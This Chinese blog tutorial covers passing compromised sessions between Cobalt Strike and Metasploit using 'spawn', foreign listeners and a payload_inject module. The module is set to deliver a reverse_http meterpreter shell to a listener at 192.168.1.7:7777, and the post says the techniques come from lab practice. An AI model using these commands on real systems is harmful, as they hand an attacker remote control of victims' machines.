Cobalt Strike与MSF联动

文中通过详细讲解CobaltStrike工具,更加深入的掌握CobaltStrike用法;文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。

Cobalt Strike 与 MSF联动

使用 spawn 命令来为一个监听器派生一个会话。此 spawn 命令接受一个架构(如:x86,x64)和一个监听器作为其参数。默认情况下, spawn 命令会在 rundll32.exe 中派生一个会话。
首先新建立了一个9999端口的监听器:
Cobalt Strike与MSF联动

spawn 监听器名

使用spawn生成新的会话,而且这个会话调用的是rundll32.exe,是在内存中运行的dll文件:
Cobalt Strike与MSF联动
在我们的渗透测试中,通常会使用到将CS生成的session派生至我们的MSF中,反之也是一样。
注:这里不论是CS->MSF 还是MSF->CS ,在MSF中使用的payload都是HTTP的,而非TCP:

CS->MSF:

我们首先在MSF建立监听:
Cobalt Strike与MSF联动
在CS中使用foreign建立外部监听:
Cobalt Strike与MSF联动
然后利用spawn将CS会话派生至MSF中:

spawn CS->MSF 

Cobalt Strike与MSF联动

MSF ->CS

将msf中的session反弹到CS上,我们需要使用 payload_inject 模块:

use windows/local/payload_inject
set disablepayloadhandler true # 注:这条很重要,主要目的是禁止msf监听
set payload windows/meterpreter/reverse_http
set lhost 192.168.1.7
set lport 7777
set session 1
exploit

Cobalt Strike与MSF联动
同样在CS中建立一个监听:
Cobalt Strike与MSF联动
执行后,成功回连:
Cobalt Strike与MSF联动

上一篇:windows server2012搭建邮箱服务器+客户端界面(hmailserver+afterlogic)+批量创建邮箱


下一篇:理解MySQL变量